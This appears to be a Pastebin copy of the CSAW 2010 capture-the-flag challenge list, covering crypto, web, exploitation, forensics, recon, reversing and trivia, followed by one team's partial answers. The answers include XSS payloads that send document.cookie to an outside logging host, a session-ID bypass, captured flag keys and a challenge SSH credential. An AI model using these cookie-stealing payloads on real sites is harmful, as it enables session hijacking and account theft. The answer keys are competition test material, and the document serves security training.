daily pastebin goal
55%
SHARE
TWEET

csaw 2k10

a guest Aug 13th, 2011 384 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. CRYPTO
  2.  
  3.  
  4. Challenges by Marcin Wielgoszewski.
  5.  
  6. http://128.238.66.100:30008/challenge1  [300 points]
  7. http://128.238.66.100:30008/challenge2  [400 points]
  8. http://128.238.66.100:30008/challenge3  [500 points]
  9.  
  10. There is an extra challenge.  [250 points]
  11.  
  12. ----
  13.  
  14. WEB BUGS
  15.  
  16.  
  17. XSS
  18.  
  19. There are five XSS challenges.  Every 15 mintues, the persistent databases are wiped, so load your payloads quickly.  ;)
  20. The keys are cookies on a client box.
  21.  
  22. XSS1  [100 points]
  23. http://128.238.66.100:30003/xss1/in.php
  24. http://128.238.66.100:30003/xss1/out.php
  25.  
  26. XSS2  [200 points]
  27. http://128.238.66.100:30003/xss2/in.php
  28. http://128.238.66.100:30003/xss2/out.php
  29.  
  30. XSS3  [300 points]
  31. http://128.238.66.100:30003/xss3/in.php
  32. http://128.238.66.100:30003/xss3/out.php
  33.  
  34. XSS4  [400 points]
  35. http://128.238.66.100:30003/xss4/in.php
  36. http://128.238.66.100:30003/xss4/out.php
  37.  
  38. XSS5  [500 points]
  39. http://128.238.66.100:30003/xss5/in.php
  40. http://128.238.66.100:30003/xss5/out.php
  41.  
  42.  
  43. SQLI
  44.  
  45. There are three SQLI challenges.  Authenticate to get the key.
  46.  
  47. SQLI1  [100 points]
  48. http://128.238.66.100:30004/sql1/auth.php
  49.  
  50. SQLI2  [200 points]
  51. http://128.238.66.100:30004/sql2/auth.phps
  52. http://128.238.66.100:30004/sql2/reg.php
  53. http://128.238.66.100:30004/sql2/auth.php
  54.  
  55. SQLI3  [300 points]
  56. Key is in @KEY
  57. http://128.238.66.100:30004/sql3/auth.php
  58.  
  59.  
  60. A programmer was tasked with making a secure website.  He thought, if everyone was always authenticated, then there would be no case where an attacker can authenticate maliciously.  Break it.  [200 points]
  61. http://128.238.66.100:30005/chal1/chal.php
  62.  
  63.  
  64. There's something different about this page, isn't there?  [300 points]
  65. http://128.238.66.100:30006/chal1/chal.php
  66.  
  67.  
  68. ??  [400 points]
  69. http://128.238.66.100:30007/chal1/chal.phps
  70. http://128.238.66.100:30007/chal1/chal.php
  71.  
  72. ----
  73. EXPLOIT
  74.  
  75.  
  76. Exploitation1  [100 points]
  77. http://128.238.66.100:30009/exploitation/1
  78. 128.238.66.100:40001
  79. 128.238.66.100:40002
  80. 128.238.66.100:40003
  81.  
  82. Exploitation2  [200 points]
  83. No need to scan it.
  84. http://128.238.66.100:30009/exploitation/2.c
  85. 128.238.66.100:40005
  86.  
  87. Exploitation3  [300 points]
  88. Get Root. Get the key. If only I can jump over the mountain without being normal
  89. ssh://128.238.66.100:40010
  90. chal3:$+1zX*(
  91. 2048 51:41:94:32:cf:b1:3f:d9:74:c1:d2:08:aa:e3:49:2b /etc/ssh/ssh_host_rsa_key.pub (RSA)
  92. 1024 22:7f:72:93:93:7e:9a:3d:01:b9:58:ea:74:1a:c5:af /etc/ssh/ssh_host_dsa_key.pub (DSA)
  93.  
  94.  
  95. Web Browser Exploitation by Dino Dai Zovi
  96.  
  97. "Operation Eos"
  98.  
  99. HyperGlobalMega Inc., a global leader in widget, gadget, and sprocket
  100. manufacturing, is quite concerned with the protection of their
  101. proprietary information.  As part of their desktop security
  102. initiative, they have based their Windows XP desktop build on the NIST
  103. Federal Desktop Core Configuration.  The FDCC is based on the Air
  104. Force customization of the Specialized Security-Limited Functionality
  105. (SSLF) recommendations in NIST SP 800-68 and DoD customization of the
  106. recommendations in Microsoft's Security Guide for Internet Explorer
  107. 7.0.  HyperGlobalMega has augmented that configuration baseline by
  108. keeping their workstations fully-up-to-date with Microsoft patches and
  109. using the latest and most secure version of Internet Explorer (IE 8
  110. with Permanent DEP on XP SP3).  However, due to backwards
  111. compatibility requirements with a number of internally-developed web
  112. applications, their desktop image includes legacy standalone versions
  113. of older Internet Explorer browsers.  HyperGlobalMega users are
  114. trained to only use these older browsers for certain intranet web
  115. applications.
  116.  
  117. A HyperGlobalMega systems administrator has inadvertently left their
  118. workstation golden image readable on a publicly accessible web server,
  119. allowing potential attackers to develop and test their attacks against
  120. HyperGlobalMega's desktop configuration:
  121.  
  122. https://trailofbits.s3.amazonaws.com/HyperGlobalMegaCorp_GoldenImage.zip?torrent
  123.  
  124. Clues:
  125.  
  126. - A little bit of reconnaissance found this employee that spends too
  127. much time on Twitter: http://twitter.com/clickaddictvic.
  128. - HyperGlobalMega's desktops run XP SP3 with IE6 (no DEP), IE7 (DEP),
  129. and IE8 (Permanent DEP).
  130. - It's hard to know which browser will be used at what time.
  131. - HGM installs a custom ActiveX component on their desktops and recon
  132. has found this sample web page that uses it:
  133. http://trailofbits.s3.amazonaws.com/index.html
  134.  
  135. Points:
  136.  
  137. - IE6: [200 points]
  138. - IE7: [300 points]
  139. - IE8: [500 points]
  140.  
  141. - Bonus points are added for writing exploits against the "Medium" or
  142. "Hard" vulnerabilities.  To be awarded these points, you must email
  143. your Vulnerable.js file with your exploit fully contained in it to
  144. ddz@theta44.org (after you use it against the target VM, obviously).
  145. If the exploit is good, you will be awarded 200 bonus points for
  146. exploiting the Medium and 500 bonus points for the Hard
  147. vulnerabilities against any version of IE.  You can submit "bonus"
  148. exploits for each target version of IE.
  149. - No bonus points are awarded for a given version of IE if one of the
  150. vulnerabilities is not successfully exploited against the live VM and
  151. your team has not retrieved the secret token for that version of IE.
  152. ---
  153. FORENSICS
  154.  
  155.  
  156. Challenges by Efstratios Gavas
  157.  
  158. What is the street address?  [100 points]
  159. http://128.238.66.100:30009/forensics/1.jpg
  160.  
  161. Hash me.  [200 points]
  162. http://128.238.66.100:30009/forensics/2.tar
  163.  
  164. What Am I Drinking?  [300 points]
  165. http://128.238.66.100:30009/forensics/3.jpg
  166.  
  167. Rick Ashtley is inside me.  [200 points and 200 points]
  168. http://128.238.66.100:30009/forensics/4.tc
  169.  
  170. ---
  171. RECON
  172.  
  173. For this category, you will be doing reconnaissance on the CSAW CTF Judges.  http://www.poly.edu/csaw-CTF/judges
  174.  
  175. Each CSAW CTF judge was given a key to hide in a place that a clever attacker might look when doing research on that judge.
  176.  
  177. The constraints are:
  178.         The key must be public.
  179.         The location of the key must be somehow tied to the judge.
  180.  
  181. [100 points each]
  182. ----
  183. REVERSING
  184.  
  185.  
  186. Challenges by Jon Chittenden
  187.  
  188. Reversing1  [100 points]
  189. http://128.238.66.100:30009/reversing/j/1.txt
  190. http://128.238.66.100:30009/reversing/j/1
  191.  
  192. Reversing2  [200 points] [BROKEN]
  193. http://128.238.66.100:30009/reversing/j/2.txt
  194. http://128.238.66.100:30009/reversing/j/2
  195.  
  196. Reversing3  [300 points]
  197. http://128.238.66.100:30009/reversing/j/3.txt
  198. http://128.238.66.100:30009/reversing/j/3
  199. http://128.238.66.100:30009/reversing/j/images/desktop.png
  200. http://128.238.66.100:30009/reversing/j/images/hurrdurr.jpg
  201. http://128.238.66.100:30009/reversing/j/images/keanu.jpg
  202. http://128.238.66.100:30009/reversing/j/images/son.gif
  203. http://128.238.66.100:30009/reversing/j/images/sponge.jpg
  204.  
  205.  
  206. Challenges by Alex Sotirov
  207.  
  208. Reversing1  [500 points]
  209. You're looking for the magical incantation that will cause the program to display the secret KEY.
  210. http://128.238.66.100:30009/reversing/a/KFJSCGEH.EXE
  211.  
  212.  
  213. Challenges by Erik Cabetas
  214.  
  215. Which door is the backdoor?  [100 points]
  216. When you find which one is, the "key" to this challenge will be the command to invoke the backdoor.
  217. http://128.238.66.100:30009/reversing/e/1.tar
  218.  
  219. Give me all the power in the world  [200 points]
  220. http://128.238.66.100:30009/reversing/e/2
  221.  
  222. genesis 1:1  [300 points]
  223. http://128.238.66.100:30009/reversing/e/3
  224. ----
  225. TRIVIA
  226.  
  227. Answers should be submitted like regular keys.
  228.  
  229. Names should be formatted like this:  [Prefix.] [I.] [I.] First [M.] [Last]  Examples:  Cpt. James T. Kirk, H. D. Moore, spender
  230. Memory Addresses should be represented in hex, prefixed with 0x.  Example:  0xDEADBAB1E5
  231. Domains should be submitted without any generic aliases.  For example www.google.com should be google.com and mail.code.google.com should be code.google.com
  232. Any questions should be directed to #trivia on the IRC server.
  233. Don't drop answers in the IRC channel, if you think you have the answer to a question, but aren't getting the points for it, PM an operator.
  234.  
  235.  
  236. Questions by Erik Cabetas
  237.  
  238. What were the three most popular sites that hosted mirrors of defaced websites and acted as a sort of "score board" for hacking groups?  [15 points each] 1,2,3
  239.  
  240. The author who published the FIRST public paper/tutorial on PHP web app vulnerabilities also co-authored a tool meant for protecting exploits so that even if a sysadmin on a compromised system found the exploit binary, they couldn't run them without a password.
  241. Who reverse engineered the aforementioned tool and spoke at the blackhat conference in Washington DC regarding his work?  [50 points] 4
  242.  
  243.  
  244. Questions by Jon Oberheide
  245.  
  246. What security group released the infamous Apache Scalp chunked-encoding remote exploit targeting OpenBSD in the early 2000s?  [25 points] 5
  247.  
  248. Under what pseudonym did a security researcher lead the Month of Kernel Bugs (MoKB) and Month of Apple Bugs (MoAB)?  [25 points] 6
  249.  
  250. Who is the only person to win a Pwnie award two years in a row in the same category?  [25 points] 7
  251.  
  252. What's wrong with the following call to setuid when used in the context of a privileged executable attempting to drop privileges?  [100 points] 8
  253.         /* assume uid 65534 is some non-privileged user (eg. nobody) */
  254.         setuid(65534);
  255.         /* perform an operation that isn't safe in a privileged context */
  256.         fp = fopen("/tmp/oh_i_sure_hope_this_isnt_a_symlink");
  257.         fwrite(attacker_controlled_data, fp);
  258.         fclose(fp);
  259.  
  260. If you have the ability to write arbitrary data to a file, what file would you most likely write in order to gain root privileges?  [100 points] 9
  261.  
  262. What's fishy about the following /etc/passwd file:  [25 points] 10,11
  263.         root:x:0:0:root:/root:/bin/bash
  264.         daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  265.         bin:x:2:2:bin:/bin:/bin/sh
  266.         sys:x:3:3:sys:/dev:/bin/sh
  267.         sync:x:4:65534:sync:/bin:/bin/sync
  268.         games:x:5:60:games:/usr/games:/bin/sh
  269.         man:x:6:12:man:/var/cache/man:/bin/sh
  270.         lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  271.         mail:x:8:8:mail:/var/mail:/bin/sh
  272.         news:x:9:9:news:/var/spool/news:/bin/sh
  273.         uucp:x:0:0:uucp:/var/spool/uucp:/bin/sh
  274.         proxy:x:13:13:proxy:/bin:/bin/sh
  275.         www-data:x:33:33:www-data:/var/www:/bin/sh
  276.         list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  277.         nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  278.         syslog:x:101:102::/home/syslog:/bin/false
  279.         messagebus:x:102:106::/var/run/dbus:/bin/false
  280.         gdm:x:112:119:Gnome Display Manager:/var/lib/gdm:/bin/false
  281.         jono:x:1000:1000:Jon Oberheide,,,:/home/jono:/bin/bash
  282.         sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
  283.         rtkit:x:117:126:RealtimeKit,,,:/proc:/bin/false
  284.  
  285.  
  286. Questions by Brandon Edwards
  287.  
  288. What type of vulnerability is shown here?  [50 points] 12
  289.        strncpy(tempbuf, userinput, sizeof(tempbuf));
  290.  
  291. How large will the allocated block be in bytes (assuming memory is available)?  [50 points] 13
  292.        uint32 datasize = 75101;
  293.        uint32 usersize = 57191;
  294.        uint32 totalsize = 0;
  295.        void *pointer = NULL;
  296.        totalsize = datasize * usersize;
  297.        pointer = malloc(totalsize);
  298.  
  299. On x86, the op code byte 0x41 executes which instruction?  [25 points] 14
  300.  
  301.  
  302. Questions by Dan Guido
  303.  
  304. This hot social web startup has been banned by the FTC from making any statements touting their security for the next 20 years.  [25 points] 15
  305.  
  306. This cryptographic attack can decrypt web session tokens just like in the movies.  [25 points] 16
  307.  
  308. This security snake oil salesman has been the target of many attacks, including XSS, so far this year.  [25 points] 17
  309.  
  310.  
  311. Questions by Marcin Wielgoszewski
  312.  
  313. I was a director of the NSA before becoming director of the CIA.  Who am I?  [25 points] 18
  314.  
  315. The cipher I used to communicate with my generals was named after me.  Who am I?  [25 points] 19
  316.  
  317. What port does Ping work over?  [25 points] 20
  318.  
  319. This operation took place in 1990 and was one of [if not the] largest and most publicized crackdowns on illegal hacking ever.  [25 points] 21
  320.  
  321.  
  322. Quesions by Dean De Beer
  323.  
  324. The function 'arguments.callee.toString()' is often seen in the malicious javascript.  What is it usually used to do in malicous JavaScript?  [50 points] 23
  325.  
  326. What are five of the methods used by the recently discovered stuxnet bot to propagate?  [15 points each] 24,25,26,27,28
  327.  
  328.  
  329. Bonus Question by the New York City Hacking Scene
  330.  
  331. What new term for "elite hacker" was coined at this years SummerCon because of the abuse of the term "hacker" by makers and arts and crafts enthusiasts?  [100 points] 22
  332. ---
  333.  
  334. Some answers:
  335. http://128.238.66.100:30007/chal1/chal.php?p[]=
  336. Correct password! 41b8a02eea3ecabe3ec93be49155be19be60625c
  337.  
  338. ====
  339. Trivia 4
  340. http://www.blackhat.com/html/bh-federal-03/bh-federal-03-speakers.html#Eagle
  341. R: Chris Eagle
  342. =====
  343. Trivia 2,3
  344. http://www.iwar.org.uk/directory/hacking/defacement-archives.htm
  345. R:
  346. 2. attrition.org
  347. 3. zone-h.org
  348. =====
  349. Trivia 5
  350. http://downloads.securityfocus.com/vulnerabilities/exploits/apache-scalp.c
  351. R: GOBBLES
  352. =====
  353. XSS 1
  354. <script>document.location="http://null-labs/log.php?c="+document.cookie;</script>
  355. key=this_is_the_first_xss_key
  356. =====
  357. XSS 2
  358. Desactivar JS
  359. <script>document.location="http://null-labs/log.php?c="+document.cookie;</script>
  360. key=now_youre_getting_good_at_this
  361. =====
  362. Session 200
  363. SESSIONID=-1
  364. http://128.238.66.100:30005/chal1/chal.php
  365. key: 922163d93317d5d8eaa142c872233015
  366. ======
  367. Trivia 15
  368. R: Twitter
  369. ======
  370. XSS 3
  371. null-labs" style="background-color:white;width:9000px;height:13000px;margin-top:-3000px;margin-left:-100px;z-index:2147483647;position:absolute;" onunload="location.replace('http://null/log.php?c='+escape(document.cookie));" onselect="location.replace('http://null/log.php?c='+escape(document.cookie));" onfocus="location.replace('http://null/log.php?c='+escape(document.cookie));" onmousemove="location.replace('http://null/log.php?c='+escape(document.cookie));
  372. ????????
  373. key=that_is_what_am_talking_about
  374. ======
  375. Trivia 18
  376. R: Michael Hayden
  377. ======
  378. Trivia 19
  379. R: Julius Caesar
  380. ======
  381. Trivia 21
  382. Operation Sundevil
  383. ======
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top